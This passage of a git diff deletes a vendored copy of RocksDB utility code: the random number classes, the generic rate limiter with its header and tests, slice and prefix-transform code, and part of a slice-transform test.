-    // repeat.  mod == M is not possible; using > allows the faster
-    // sign-bit-based test.
-    if (seed_ > M) {
-      seed_ -= M;
-    }
-    return seed_;
-  }
-
-  // Returns a uniformly distributed value in the range [0..n-1]
-  // REQUIRES: n > 0
-  uint32_t Uniform(int n) { return Next() % n; }
-
-  // Randomly returns true ~"1/n" of the time, and false otherwise.
-  // REQUIRES: n > 0
-  bool OneIn(int n) { return (Next() % n) == 0; }
-
-  // Skewed: pick "base" uniformly from range [0,max_log] and then
-  // return "base" random bits.  The effect is to pick a number in the
-  // range [0,2^max_log-1] with exponential bias towards smaller numbers.
-  uint32_t Skewed(int max_log) {
-    return Uniform(1 << Uniform(max_log + 1));
-  }
-
-  // Returns a Random instance for use by the current thread without
-  // additional locking
-  static Random* GetTLSInstance();
-};
-
-// A simple 64bit random number generator based on std::mt19937_64
-class Random64 {
- private:
-  std::mt19937_64 generator_;
-
- public:
-  explicit Random64(uint64_t s) : generator_(s) { }
-
-  // Generates the next random number
-  uint64_t Next() { return generator_(); }
-
-  // Returns a uniformly distributed value in the range [0..n-1]
-  // REQUIRES: n > 0
-  uint64_t Uniform(uint64_t n) {
-    return std::uniform_int_distribution<uint64_t>(0, n - 1)(generator_);
-  }
-
-  // Randomly returns true ~"1/n" of the time, and false otherwise.
-  // REQUIRES: n > 0
-  bool OneIn(uint64_t n) { return Uniform(n) == 0; }
-
-  // Skewed: pick "base" uniformly from range [0,max_log] and then
-  // return "base" random bits.  The effect is to pick a number in the
-  // range [0,2^max_log-1] with exponential bias towards smaller numbers.
-  uint64_t Skewed(int max_log) {
-    return Uniform(uint64_t(1) << Uniform(max_log + 1));
-  }
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/rate_limiter.cc b/thirdparty/rocksdb/util/rate_limiter.cc
deleted file mode 100644
index b9160b2..0000000
--- a/thirdparty/rocksdb/util/rate_limiter.cc
+++ /dev/null
@@ -1,270 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "util/rate_limiter.h"
-#include "monitoring/statistics.h"
-#include "port/port.h"
-#include "rocksdb/env.h"
-#include "util/aligned_buffer.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-size_t RateLimiter::RequestToken(size_t bytes, size_t alignment,
-                                 Env::IOPriority io_priority, Statistics* stats,
-                                 RateLimiter::OpType op_type) {
-  if (io_priority < Env::IO_TOTAL && IsRateLimited(op_type)) {
-    bytes = std::min(bytes, static_cast<size_t>(GetSingleBurstBytes()));
-
-    if (alignment > 0) {
-      // Here we may actually require more than burst and block
-      // but we can not write less than one page at a time on direct I/O
-      // thus we may want not to use ratelimiter
-      bytes = std::max(alignment, TruncateToPageBoundary(alignment, bytes));
-    }
-    Request(bytes, io_priority, stats, op_type);
-  }
-  return bytes;
-}
-
-// Pending request
-struct GenericRateLimiter::Req {
-  explicit Req(int64_t _bytes, port::Mutex* _mu)
-      : request_bytes(_bytes), bytes(_bytes), cv(_mu), granted(false) {}
-  int64_t request_bytes;
-  int64_t bytes;
-  port::CondVar cv;
-  bool granted;
-};
-
-GenericRateLimiter::GenericRateLimiter(int64_t rate_bytes_per_sec,
-                                       int64_t refill_period_us,
-                                       int32_t fairness, RateLimiter::Mode mode)
-    : RateLimiter(mode),
-      refill_period_us_(refill_period_us),
-      rate_bytes_per_sec_(rate_bytes_per_sec),
-      refill_bytes_per_period_(
-          CalculateRefillBytesPerPeriod(rate_bytes_per_sec)),
-      env_(Env::Default()),
-      stop_(false),
-      exit_cv_(&request_mutex_),
-      requests_to_wait_(0),
-      available_bytes_(0),
-      next_refill_us_(NowMicrosMonotonic(env_)),
-      fairness_(fairness > 100 ? 100 : fairness),
-      rnd_((uint32_t)time(nullptr)),
-      leader_(nullptr) {
-  total_requests_[0] = 0;
-  total_requests_[1] = 0;
-  total_bytes_through_[0] = 0;
-  total_bytes_through_[1] = 0;
-}
-
-GenericRateLimiter::~GenericRateLimiter() {
-  MutexLock g(&request_mutex_);
-  stop_ = true;
-  requests_to_wait_ = static_cast<int32_t>(queue_[Env::IO_LOW].size() +
-                                           queue_[Env::IO_HIGH].size());
-  for (auto& r : queue_[Env::IO_HIGH]) {
-    r->cv.Signal();
-  }
-  for (auto& r : queue_[Env::IO_LOW]) {
-    r->cv.Signal();
-  }
-  while (requests_to_wait_ > 0) {
-    exit_cv_.Wait();
-  }
-}
-
-// This API allows user to dynamically change rate limiter's bytes per second.
-void GenericRateLimiter::SetBytesPerSecond(int64_t bytes_per_second) {
-  assert(bytes_per_second > 0);
-  rate_bytes_per_sec_ = bytes_per_second;
-  refill_bytes_per_period_.store(
-      CalculateRefillBytesPerPeriod(bytes_per_second),
-      std::memory_order_relaxed);
-}
-
-void GenericRateLimiter::Request(int64_t bytes, const Env::IOPriority pri,
-                                 Statistics* stats) {
-  assert(bytes <= refill_bytes_per_period_.load(std::memory_order_relaxed));
-  TEST_SYNC_POINT("GenericRateLimiter::Request");
-  TEST_SYNC_POINT_CALLBACK("GenericRateLimiter::Request:1",
-                           &rate_bytes_per_sec_);
-  MutexLock g(&request_mutex_);
-  if (stop_) {
-    return;
-  }
-
-  ++total_requests_[pri];
-
-  if (available_bytes_ >= bytes) {
-    // Refill thread assigns quota and notifies requests waiting on
-    // the queue under mutex. So if we get here, that means nobody
-    // is waiting?
-    available_bytes_ -= bytes;
-    total_bytes_through_[pri] += bytes;
-    return;
-  }
-
-  // Request cannot be satisfied at this moment, enqueue
-  Req r(bytes, &request_mutex_);
-  queue_[pri].push_back(&r);
-
-  do {
-    bool timedout = false;
-    // Leader election, candidates can be:
-    // (1) a new incoming request,
-    // (2) a previous leader, whose quota has not been not assigned yet due
-    //     to lower priority
-    // (3) a previous waiter at the front of queue, who got notified by
-    //     previous leader
-    if (leader_ == nullptr &&
-        ((!queue_[Env::IO_HIGH].empty() &&
-            &r == queue_[Env::IO_HIGH].front()) ||
-         (!queue_[Env::IO_LOW].empty() &&
-            &r == queue_[Env::IO_LOW].front()))) {
-      leader_ = &r;
-      int64_t delta = next_refill_us_ - NowMicrosMonotonic(env_);
-      delta = delta > 0 ? delta : 0;
-      if (delta == 0) {
-        timedout = true;
-      } else {
-        int64_t wait_until = env_->NowMicros() + delta;
-        RecordTick(stats, NUMBER_RATE_LIMITER_DRAINS);
-        timedout = r.cv.TimedWait(wait_until);
-      }
-    } else {
-      // Not at the front of queue or an leader has already been elected
-      r.cv.Wait();
-    }
-
-    // request_mutex_ is held from now on
-    if (stop_) {
-      --requests_to_wait_;
-      exit_cv_.Signal();
-      return;
-    }
-
-    // Make sure the waken up request is always the header of its queue
-    assert(r.granted ||
-           (!queue_[Env::IO_HIGH].empty() &&
-            &r == queue_[Env::IO_HIGH].front()) ||
-           (!queue_[Env::IO_LOW].empty() &&
-            &r == queue_[Env::IO_LOW].front()));
-    assert(leader_ == nullptr ||
-           (!queue_[Env::IO_HIGH].empty() &&
-            leader_ == queue_[Env::IO_HIGH].front()) ||
-           (!queue_[Env::IO_LOW].empty() &&
-            leader_ == queue_[Env::IO_LOW].front()));
-
-    if (leader_ == &r) {
-      // Waken up from TimedWait()
-      if (timedout) {
-        // Time to do refill!
-        Refill();
-
-        // Re-elect a new leader regardless. This is to simplify the
-        // election handling.
-        leader_ = nullptr;
-
-        // Notify the header of queue if current leader is going away
-        if (r.granted) {
-          // Current leader already got granted with quota. Notify header
-          // of waiting queue to participate next round of election.
-          assert((queue_[Env::IO_HIGH].empty() ||
-                    &r != queue_[Env::IO_HIGH].front()) &&
-                 (queue_[Env::IO_LOW].empty() ||
-                    &r != queue_[Env::IO_LOW].front()));
-          if (!queue_[Env::IO_HIGH].empty()) {
-            queue_[Env::IO_HIGH].front()->cv.Signal();
-          } else if (!queue_[Env::IO_LOW].empty()) {
-            queue_[Env::IO_LOW].front()->cv.Signal();
-          }
-          // Done
-          break;
-        }
-      } else {
-        // Spontaneous wake up, need to continue to wait
-        assert(!r.granted);
-        leader_ = nullptr;
-      }
-    } else {
-      // Waken up by previous leader:
-      // (1) if requested quota is granted, it is done.
-      // (2) if requested quota is not granted, this means current thread
-      // was picked as a new leader candidate (previous leader got quota).
-      // It needs to participate leader election because a new request may
-      // come in before this thread gets waken up. So it may actually need
-      // to do Wait() again.
-      assert(!timedout);
-    }
-  } while (!r.granted);
-}
-
-void GenericRateLimiter::Refill() {
-  TEST_SYNC_POINT("GenericRateLimiter::Refill");
-  next_refill_us_ = NowMicrosMonotonic(env_) + refill_period_us_;
-  // Carry over the left over quota from the last period
-  auto refill_bytes_per_period =
-      refill_bytes_per_period_.load(std::memory_order_relaxed);
-  if (available_bytes_ < refill_bytes_per_period) {
-    available_bytes_ += refill_bytes_per_period;
-  }
-
-  int use_low_pri_first = rnd_.OneIn(fairness_) ? 0 : 1;
-  for (int q = 0; q < 2; ++q) {
-    auto use_pri = (use_low_pri_first == q) ? Env::IO_LOW : Env::IO_HIGH;
-    auto* queue = &queue_[use_pri];
-    while (!queue->empty()) {
-      auto* next_req = queue->front();
-      if (available_bytes_ < next_req->request_bytes) {
-        // avoid starvation
-        next_req->request_bytes -= available_bytes_;
-        available_bytes_ = 0;
-        break;
-      }
-      available_bytes_ -= next_req->request_bytes;
-      next_req->request_bytes = 0;
-      total_bytes_through_[use_pri] += next_req->bytes;
-      queue->pop_front();
-
-      next_req->granted = true;
-      if (next_req != leader_) {
-        // Quota granted, signal the thread
-        next_req->cv.Signal();
-      }
-    }
-  }
-}
-
-int64_t GenericRateLimiter::CalculateRefillBytesPerPeriod(
-    int64_t rate_bytes_per_sec) {
-  if (port::kMaxInt64 / rate_bytes_per_sec < refill_period_us_) {
-    // Avoid unexpected result in the overflow case. The result now is still
-    // inaccurate but is a number that is large enough.
-    return port::kMaxInt64 / 1000000;
-  } else {
-    return std::max(kMinRefillBytesPerPeriod,
-                    rate_bytes_per_sec * refill_period_us_ / 1000000);
-  }
-}
-
-RateLimiter* NewGenericRateLimiter(
-    int64_t rate_bytes_per_sec, int64_t refill_period_us /* = 100 * 1000 */,
-    int32_t fairness /* = 10 */,
-    RateLimiter::Mode mode /* = RateLimiter::Mode::kWritesOnly */) {
-  assert(rate_bytes_per_sec > 0);
-  assert(refill_period_us > 0);
-  assert(fairness > 0);
-  return new GenericRateLimiter(rate_bytes_per_sec, refill_period_us, fairness,
-                                mode);
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/rate_limiter.h b/thirdparty/rocksdb/util/rate_limiter.h
deleted file mode 100644
index 0564bd0..0000000
--- a/thirdparty/rocksdb/util/rate_limiter.h
+++ /dev/null
@@ -1,104 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#include <algorithm>
-#include <atomic>
-#include <deque>
-#include "port/port.h"
-#include "util/mutexlock.h"
-#include "util/random.h"
-#include "rocksdb/env.h"
-#include "rocksdb/rate_limiter.h"
-
-namespace rocksdb {
-
-class GenericRateLimiter : public RateLimiter {
- public:
-  GenericRateLimiter(int64_t refill_bytes, int64_t refill_period_us,
-                     int32_t fairness,
-                     RateLimiter::Mode mode = RateLimiter::Mode::kWritesOnly);
-
-  virtual ~GenericRateLimiter();
-
-  // This API allows user to dynamically change rate limiter's bytes per second.
-  virtual void SetBytesPerSecond(int64_t bytes_per_second) override;
-
-  // Request for token to write bytes. If this request can not be satisfied,
-  // the call is blocked. Caller is responsible to make sure
-  // bytes <= GetSingleBurstBytes()
-  using RateLimiter::Request;
-  virtual void Request(const int64_t bytes, const Env::IOPriority pri,
-                       Statistics* stats) override;
-
-  virtual int64_t GetSingleBurstBytes() const override {
-    return refill_bytes_per_period_.load(std::memory_order_relaxed);
-  }
-
-  virtual int64_t GetTotalBytesThrough(
-      const Env::IOPriority pri = Env::IO_TOTAL) const override {
-    MutexLock g(&request_mutex_);
-    if (pri == Env::IO_TOTAL) {
-      return total_bytes_through_[Env::IO_LOW] +
-             total_bytes_through_[Env::IO_HIGH];
-    }
-    return total_bytes_through_[pri];
-  }
-
-  virtual int64_t GetTotalRequests(
-      const Env::IOPriority pri = Env::IO_TOTAL) const override {
-    MutexLock g(&request_mutex_);
-    if (pri == Env::IO_TOTAL) {
-      return total_requests_[Env::IO_LOW] + total_requests_[Env::IO_HIGH];
-    }
-    return total_requests_[pri];
-  }
-
-  virtual int64_t GetBytesPerSecond() const override {
-    return rate_bytes_per_sec_;
-  }
-
- private:
-  void Refill();
-  int64_t CalculateRefillBytesPerPeriod(int64_t rate_bytes_per_sec);
-  uint64_t NowMicrosMonotonic(Env* env) {
-    return env->NowNanos() / std::milli::den;
-  }
-
-  // This mutex guard all internal states
-  mutable port::Mutex request_mutex_;
-
-  const int64_t kMinRefillBytesPerPeriod = 100;
-
-  const int64_t refill_period_us_;
-
-  int64_t rate_bytes_per_sec_;
-  // This variable can be changed dynamically.
-  std::atomic<int64_t> refill_bytes_per_period_;
-  Env* const env_;
-
-  bool stop_;
-  port::CondVar exit_cv_;
-  int32_t requests_to_wait_;
-
-  int64_t total_requests_[Env::IO_TOTAL];
-  int64_t total_bytes_through_[Env::IO_TOTAL];
-  int64_t available_bytes_;
-  int64_t next_refill_us_;
-
-  int32_t fairness_;
-  Random rnd_;
-
-  struct Req;
-  Req* leader_;
-  std::deque<Req*> queue_[Env::IO_TOTAL];
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/rate_limiter_test.cc b/thirdparty/rocksdb/util/rate_limiter_test.cc
deleted file mode 100644
index f099808..0000000
--- a/thirdparty/rocksdb/util/rate_limiter_test.cc
+++ /dev/null
@@ -1,180 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include "util/rate_limiter.h"
-#include <inttypes.h>
-#include <limits>
-#include "rocksdb/env.h"
-#include "util/random.h"
-#include "util/sync_point.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-
-// TODO(yhchiang): the rate will not be accurate when we run test in parallel.
-class RateLimiterTest : public testing::Test {};
-
-TEST_F(RateLimiterTest, OverflowRate) {
-  GenericRateLimiter limiter(port::kMaxInt64, 1000, 10);
-  ASSERT_GT(limiter.GetSingleBurstBytes(), 1000000000ll);
-}
-
-TEST_F(RateLimiterTest, StartStop) {
-  std::unique_ptr<RateLimiter> limiter(NewGenericRateLimiter(100, 100, 10));
-}
-
-TEST_F(RateLimiterTest, Modes) {
-  for (auto mode : {RateLimiter::Mode::kWritesOnly,
-                    RateLimiter::Mode::kReadsOnly, RateLimiter::Mode::kAllIo}) {
-    GenericRateLimiter limiter(2000 /* rate_bytes_per_sec */,
-                               1000 * 1000 /* refill_period_us */,
-                               10 /* fairness */, mode);
-    limiter.Request(1000 /* bytes */, Env::IO_HIGH, nullptr /* stats */,
-                    RateLimiter::OpType::kRead);
-    if (mode == RateLimiter::Mode::kWritesOnly) {
-      ASSERT_EQ(0, limiter.GetTotalBytesThrough(Env::IO_HIGH));
-    } else {
-      ASSERT_EQ(1000, limiter.GetTotalBytesThrough(Env::IO_HIGH));
-    }
-
-    limiter.Request(1000 /* bytes */, Env::IO_HIGH, nullptr /* stats */,
-                    RateLimiter::OpType::kWrite);
-    if (mode == RateLimiter::Mode::kAllIo) {
-      ASSERT_EQ(2000, limiter.GetTotalBytesThrough(Env::IO_HIGH));
-    } else {
-      ASSERT_EQ(1000, limiter.GetTotalBytesThrough(Env::IO_HIGH));
-    }
-  }
-}
-
-#if !(defined(TRAVIS) && defined(OS_MACOSX))
-TEST_F(RateLimiterTest, Rate) {
-  auto* env = Env::Default();
-  struct Arg {
-    Arg(int32_t _target_rate, int _burst)
-        : limiter(NewGenericRateLimiter(_target_rate, 100 * 1000, 10)),
-          request_size(_target_rate / 10),
-          burst(_burst) {}
-    std::unique_ptr<RateLimiter> limiter;
-    int32_t request_size;
-    int burst;
-  };
-
-  auto writer = [](void* p) {
-    auto* thread_env = Env::Default();
-    auto* arg = static_cast<Arg*>(p);
-    // Test for 2 seconds
-    auto until = thread_env->NowMicros() + 2 * 1000000;
-    Random r((uint32_t)(thread_env->NowNanos() %
-                        std::numeric_limits<uint32_t>::max()));
-    while (thread_env->NowMicros() < until) {
-      for (int i = 0; i < static_cast<int>(r.Skewed(arg->burst) + 1); ++i) {
-        arg->limiter->Request(r.Uniform(arg->request_size - 1) + 1,
-                              Env::IO_HIGH, nullptr /* stats */,
-                              RateLimiter::OpType::kWrite);
-      }
-      arg->limiter->Request(r.Uniform(arg->request_size - 1) + 1, Env::IO_LOW,
-                            nullptr /* stats */, RateLimiter::OpType::kWrite);
-    }
-  };
-
-  for (int i = 1; i <= 16; i *= 2) {
-    int32_t target = i * 1024 * 10;
-    Arg arg(target, i / 4 + 1);
-    int64_t old_total_bytes_through = 0;
-    for (int iter = 1; iter <= 2; ++iter) {
-      // second iteration changes the target dynamically
-      if (iter == 2) {
-        target *= 2;
-        arg.limiter->SetBytesPerSecond(target);
-      }
-      auto start = env->NowMicros();
-      for (int t = 0; t < i; ++t) {
-        env->StartThread(writer, &arg);
-      }
-      env->WaitForJoin();
-
-      auto elapsed = env->NowMicros() - start;
-      double rate =
-          (arg.limiter->GetTotalBytesThrough() - old_total_bytes_through) *
-          1000000.0 / elapsed;
-      old_total_bytes_through = arg.limiter->GetTotalBytesThrough();
-      fprintf(stderr,
-              "request size [1 - %" PRIi32 "], limit %" PRIi32
-              " KB/sec, actual rate: %lf KB/sec, elapsed %.2lf seconds\n",
-              arg.request_size - 1, target / 1024, rate / 1024,
-              elapsed / 1000000.0);
-
-      ASSERT_GE(rate / target, 0.80);
-      ASSERT_LE(rate / target, 1.25);
-    }
-  }
-}
-#endif
-
-TEST_F(RateLimiterTest, LimitChangeTest) {
-  // starvation test when limit changes to a smaller value
-  int64_t refill_period = 1000 * 1000;
-  auto* env = Env::Default();
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  struct Arg {
-    Arg(int32_t _request_size, Env::IOPriority _pri,
-        std::shared_ptr<RateLimiter> _limiter)
-        : request_size(_request_size), pri(_pri), limiter(_limiter) {}
-    int32_t request_size;
-    Env::IOPriority pri;
-    std::shared_ptr<RateLimiter> limiter;
-  };
-
-  auto writer = [](void* p) {
-    auto* arg = static_cast<Arg*>(p);
-    arg->limiter->Request(arg->request_size, arg->pri, nullptr /* stats */,
-                          RateLimiter::OpType::kWrite);
-  };
-
-  for (uint32_t i = 1; i <= 16; i <<= 1) {
-    int32_t target = i * 1024 * 10;
-    // refill per second
-    for (int iter = 0; iter < 2; iter++) {
-      std::shared_ptr<RateLimiter> limiter =
-          std::make_shared<GenericRateLimiter>(target, refill_period, 10);
-      rocksdb::SyncPoint::GetInstance()->LoadDependency(
-          {{"GenericRateLimiter::Request",
-            "RateLimiterTest::LimitChangeTest:changeLimitStart"},
-           {"RateLimiterTest::LimitChangeTest:changeLimitEnd",
-            "GenericRateLimiter::Refill"}});
-      Arg arg(target, Env::IO_HIGH, limiter);
-      // The idea behind is to start a request first, then before it refills,
-      // update limit to a different value (2X/0.5X). No starvation should
-      // be guaranteed under any situation
-      // TODO(lightmark): more test cases are welcome.
-      env->StartThread(writer, &arg);
-      int32_t new_limit = (target << 1) >> (iter << 1);
-      TEST_SYNC_POINT("RateLimiterTest::LimitChangeTest:changeLimitStart");
-      arg.limiter->SetBytesPerSecond(new_limit);
-      TEST_SYNC_POINT("RateLimiterTest::LimitChangeTest:changeLimitEnd");
-      env->WaitForJoin();
-      fprintf(stderr,
-              "[COMPLETE] request size %" PRIi32 " KB, new limit %" PRIi32
-              "KB/sec, refill period %" PRIi64 " ms\n",
-              target / 1024, new_limit / 1024, refill_period / 1000);
-    }
-  }
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/util/slice.cc b/thirdparty/rocksdb/util/slice.cc
deleted file mode 100644
index 8d95a8a..0000000
--- a/thirdparty/rocksdb/util/slice.cc
+++ /dev/null
@@ -1,202 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2012 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include <algorithm>
-#include "rocksdb/slice_transform.h"
-#include "rocksdb/slice.h"
-#include "util/string_util.h"
-#include <stdio.h>
-
-namespace rocksdb {
-
-namespace {
-
-class FixedPrefixTransform : public SliceTransform {
- private:
-  size_t prefix_len_;
-  std::string name_;
-
- public:
-  explicit FixedPrefixTransform(size_t prefix_len)
-      : prefix_len_(prefix_len),
-        // Note that if any part of the name format changes, it will require
-        // changes on options_helper in order to make RocksDBOptionsParser work
-        // for the new change.
-        // TODO(yhchiang): move serialization / deserializaion code inside
-        // the class implementation itself.
-        name_("rocksdb.FixedPrefix." + ToString(prefix_len_)) {}
-
-  virtual const char* Name() const override { return name_.c_str(); }
-
-  virtual Slice Transform(const Slice& src) const override {
-    assert(InDomain(src));
-    return Slice(src.data(), prefix_len_);
-  }
-
-  virtual bool InDomain(const Slice& src) const override {
-    return (src.size() >= prefix_len_);
-  }
-
-  virtual bool InRange(const Slice& dst) const override {
-    return (dst.size() == prefix_len_);
-  }
-
-  virtual bool SameResultWhenAppended(const Slice& prefix) const override {
-    return InDomain(prefix);
-  }
-};
-
-class CappedPrefixTransform : public SliceTransform {
- private:
-  size_t cap_len_;
-  std::string name_;
-
- public:
-  explicit CappedPrefixTransform(size_t cap_len)
-      : cap_len_(cap_len),
-        // Note that if any part of the name format changes, it will require
-        // changes on options_helper in order to make RocksDBOptionsParser work
-        // for the new change.
-        // TODO(yhchiang): move serialization / deserializaion code inside
-        // the class implementation itself.
-        name_("rocksdb.CappedPrefix." + ToString(cap_len_)) {}
-
-  virtual const char* Name() const override { return name_.c_str(); }
-
-  virtual Slice Transform(const Slice& src) const override {
-    assert(InDomain(src));
-    return Slice(src.data(), std::min(cap_len_, src.size()));
-  }
-
-  virtual bool InDomain(const Slice& src) const override { return true; }
-
-  virtual bool InRange(const Slice& dst) const override {
-    return (dst.size() <= cap_len_);
-  }
-
-  virtual bool SameResultWhenAppended(const Slice& prefix) const override {
-    return prefix.size() >= cap_len_;
-  }
-};
-
-class NoopTransform : public SliceTransform {
- public:
-  explicit NoopTransform() { }
-
-  virtual const char* Name() const override { return "rocksdb.Noop"; }
-
-  virtual Slice Transform(const Slice& src) const override { return src; }
-
-  virtual bool InDomain(const Slice& src) const override { return true; }
-
-  virtual bool InRange(const Slice& dst) const override { return true; }
-
-  virtual bool SameResultWhenAppended(const Slice& prefix) const override {
-    return false;
-  }
-};
-
-}
-
-// 2 small internal utility functions, for efficient hex conversions
-// and no need for snprintf, toupper etc...
-// Originally from wdt/util/EncryptionUtils.cpp - for ToString(true)/DecodeHex:
-char toHex(unsigned char v) {
-  if (v <= 9) {
-    return '0' + v;
-  }
-  return 'A' + v - 10;
-}
-// most of the code is for validation/error check
-int fromHex(char c) {
-  // toupper:
-  if (c >= 'a' && c <= 'f') {
-    c -= ('a' - 'A');  // aka 0x20
-  }
-  // validation
-  if (c < '0' || (c > '9' && (c < 'A' || c > 'F'))) {
-    return -1;  // invalid not 0-9A-F hex char
-  }
-  if (c <= '9') {
-    return c - '0';
-  }
-  return c - 'A' + 10;
-}
-
-Slice::Slice(const SliceParts& parts, std::string* buf) {
-  size_t length = 0;
-  for (int i = 0; i < parts.num_parts; ++i) {
-    length += parts.parts[i].size();
-  }
-  buf->reserve(length);
-
-  for (int i = 0; i < parts.num_parts; ++i) {
-    buf->append(parts.parts[i].data(), parts.parts[i].size());
-  }
-  data_ = buf->data();
-  size_ = buf->size();
-}
-
-// Return a string that contains the copy of the referenced data.
-std::string Slice::ToString(bool hex) const {
-  std::string result;  // RVO/NRVO/move
-  if (hex) {
-    result.reserve(2 * size_);
-    for (size_t i = 0; i < size_; ++i) {
-      unsigned char c = data_[i];
-      result.push_back(toHex(c >> 4));
-      result.push_back(toHex(c & 0xf));
-    }
-    return result;
-  } else {
-    result.assign(data_, size_);
-    return result;
-  }
-}
-
-// Originally from rocksdb/utilities/ldb_cmd.h
-bool Slice::DecodeHex(std::string* result) const {
-  std::string::size_type len = size_;
-  if (len % 2) {
-    // Hex string must be even number of hex digits to get complete bytes back
-    return false;
-  }
-  if (!result) {
-    return false;
-  }
-  result->clear();
-  result->reserve(len / 2);
-
-  for (size_t i = 0; i < len;) {
-    int h1 = fromHex(data_[i++]);
-    if (h1 < 0) {
-      return false;
-    }
-    int h2 = fromHex(data_[i++]);
-    if (h2 < 0) {
-      return false;
-    }
-    result->push_back((h1 << 4) | h2);
-  }
-  return true;
-}
-
-const SliceTransform* NewFixedPrefixTransform(size_t prefix_len) {
-  return new FixedPrefixTransform(prefix_len);
-}
-
-const SliceTransform* NewCappedPrefixTransform(size_t cap_len) {
-  return new CappedPrefixTransform(cap_len);
-}
-
-const SliceTransform* NewNoopTransform() {
-  return new NoopTransform;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/slice_transform_test.cc b/thirdparty/rocksdb/util/slice_transform_test.cc
deleted file mode 100644
index 0b0e564..0000000
--- a/thirdparty/rocksdb/util/slice_transform_test.cc
+++ /dev/null
@@ -1,153 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "rocksdb/slice_transform.h"
-
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/filter_policy.h"
-#include "rocksdb/statistics.h"
-#include "rocksdb/table.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-
-class SliceTransformTest : public testing::Test {};
-
-TEST_F(SliceTransformTest, CapPrefixTransform) {
-  std::string s;
-  s = "abcdefge";
-
-  unique_ptr<const SliceTransform> transform;
-
-  transform.reset(NewCappedPrefixTransform(6));
-  ASSERT_EQ(transform->Transform(s).ToString(), "abcdef");
-  ASSERT_TRUE(transform->SameResultWhenAppended("123456"));
-  ASSERT_TRUE(transform->SameResultWhenAppended("1234567"));
-  ASSERT_TRUE(!transform->SameResultWhenAppended("12345"));
-
-  transform.reset(NewCappedPrefixTransform(8));
-  ASSERT_EQ(transform->Transform(s).ToString(), "abcdefge");
-
-  transform.reset(NewCappedPrefixTransform(10));
-  ASSERT_EQ(transform->Transform(s).ToString(), "abcdefge");
-
-  transform.reset(NewCappedPrefixTransform(0));
-  ASSERT_EQ(transform->Transform(s).ToString(), "");
-
-  transform.reset(NewCappedPrefixTransform(0));
-  ASSERT_EQ(transform->Transform("").ToString(), "");
-}
-
-class SliceTransformDBTest : public testing::Test {
- private:
-  std::string dbname_;
-  Env* env_;
-  DB* db_;
-
- public:
-  SliceTransformDBTest() : env_(Env::Default()), db_(nullptr) {
-    dbname_ = test::TmpDir() + "/slice_transform_db_test";
-    EXPECT_OK(DestroyDB(dbname_, last_options_));
-  }
-
-  ~SliceTransformDBTest() {
-    delete db_;
-    EXPECT_OK(DestroyDB(dbname_, last_options_));
-  }
-
-  DB* db() { return db_; }
-
-  // Return the current option configuration.
-  Options* GetOptions() { return &last_options_; }
-
-  void DestroyAndReopen() {
-    // Destroy using last options
-    Destroy();
-    ASSERT_OK(TryReopen());
-  }
-
-  void Destroy() {
-    delete db_;
-    db_ = nullptr;
-    ASSERT_OK(DestroyDB(dbname_, last_options_));
-  }
-
-  Status TryReopen() {
-    delete db_;
-    db_ = nullptr;
-    last_options_.create_if_missing = true;
-
-    return DB::Open(last_options_, dbname_, &db_);
-  }
-
-  Options last_options_;
-};
-
-namespace {
-uint64_t TestGetTickerCount(const Options& options, Tickers ticker_type) {
-  return options.statistics->getTickerCount(ticker_type);
-}
-}  // namespace
-
-TEST_F(SliceTransformDBTest, CapPrefix) {
-  last_options_.prefix_extractor.reset(NewCappedPrefixTransform(8));
-  last_options_.statistics = rocksdb::CreateDBStatistics();
-  BlockBasedTableOptions bbto;
-  bbto.filter_policy.reset(NewBloomFilterPolicy(10, false));
-  bbto.whole_key_filtering = false;
-  last_options_.table_factory.reset(NewBlockBasedTableFactory(bbto));
-  ASSERT_OK(TryReopen());
-
-  ReadOptions ro;
-  FlushOptions fo;
-  WriteOptions wo;
-
